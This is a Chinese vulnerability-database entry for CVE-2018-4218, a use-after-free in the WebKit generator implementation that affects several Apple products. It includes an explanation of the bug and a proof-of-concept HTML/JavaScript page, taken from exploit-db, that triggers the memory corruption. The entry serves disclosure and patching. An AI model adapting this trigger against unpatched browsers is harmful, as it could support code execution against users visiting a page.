多款Apple产品WebKit 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1125147 漏洞类型 资源管理错误
发布时间 2018-06-08 更新时间 2019-10-08
CVE编号 CVE-2018-4218 CNNVD-ID CNNVD-201806-614
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/44861
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201806-614
|漏洞详情
Apple iOS等都是美国苹果(Apple)公司的产品。Apple iOS是为移动设备所开发的一套操作系统;Safari是一款Web浏览器,是Mac OS X和iOS操作系统附带的默认浏览器。iCloud for Windows是一款基于Windows平台的云服务。WebKit是其中的一个Web浏览器引擎组件。 多款Apple产品中的WebKit组件存在安全漏洞。攻击者可借助恶意制作的Web内容利用该漏洞执行任意代码(内存损坏)。以下产品和版本受到影响:Apple iOS 11.4之前版本;Safari 11.1.1之前版本;基于Windows平台的iCloud 7.5之前版本;基于Windows平台的iTunes 12.7.5之前版本;tvOS 11.4之前版本;watchOS 4.3.1之前版本。
|漏洞EXP
<!--
In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:

    var state = this.@generatorState;

and set by calling:

    generator.@generatorState = @GeneratorStateExecuting;


Checking that the @generator property is set is also used in place of type checking the generator.

Therefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.

It is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.

Generators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.

A minimal sample of the script causing this problem is below, and a full PoC is attached.

var iterator;

var a = [];

function* foo(index) {

  while (1) {
    var q = a.pop();
    if(q){
    	q.__proto__ = iterator;
  	  q.next();
    }
    yield index++;
  }
}

function* foo2(){
    yield;
}

var temp = foo2(0);

for(var i = 0; i < 10; i++){ // make a few objects with @generatorState set
	var q = {};
	q.__proto__ = temp;
	q.next();
	q.__proto__ = {};
	a.push(q);

}

iterator = foo(0);

var q = {};
q.__proto__ = iterator;
print(q.next().value);
-->

<html><body><script>
print = console.log;
print("top");
var iterator;
var o = function(){print("hello")};
var a = [];
function* foo(index) {
  //print("start");

  while (1) {
    //if(index == 77){
      //  o = 0;
       // gc();        
//	index = 2;
  //      var a = [1, 2, 3, 4];
	//yield 9;
        //print("a vale " + a[0]);
    //}
    //if(index == 1){
    //index = 77;
   // print("INTERNAL CALL")
   // iterator.next();
    //index++;

    //}
    //var b = [1, 2, 3, 4];
    var q = a.pop();
    if(q){
    print("here1");
    q.__proto__ = iterator;
    q.next();
    }
    yield index++;
    //print("bval" + b[0]);
  }
}

function* foo2(){

    yield;

}

var temp = foo2(0);

for(var i = 0; i < 10; i++){

	var q = {};
	q.__proto__ = temp;
	q.next();
	q.__proto__ = {};
	a.push(q);

}
//print(a);
iterator = foo(0);


// expected output: 0




o.__proto__ = iterator;
//print("FIRST CALL")
//print(o.next().value);
//print("SECOND CALL")
//print(o.next().value);
//print("THIRD CALL")

for(var i = 0; i < 10; i++){
var q = {};
q.__proto__ = iterator;
print(q.next("hello").value);
}

//print("FOURTH CALL")
//print(iterator.next().value);
o();
</script></body></html>
|参考资料

来源:www.securitytracker.com

链接:http://www.securitytracker.com/id/1041029


来源:bugs.chromium.org

链接:https://bugs.chromium.org/p/project-zero/issues/detail?id=1553


来源:support.apple.com

链接:https://support.apple.com/HT208848


来源:support.apple.com

链接:https://support.apple.com/HT208850


来源:support.apple.com

链接:https://support.apple.com/HT208851


来源:support.apple.com

链接:https://support.apple.com/HT208852


来源:support.apple.com

链接:https://support.apple.com/HT208853


来源:support.apple.com

链接:https://support.apple.com/HT208854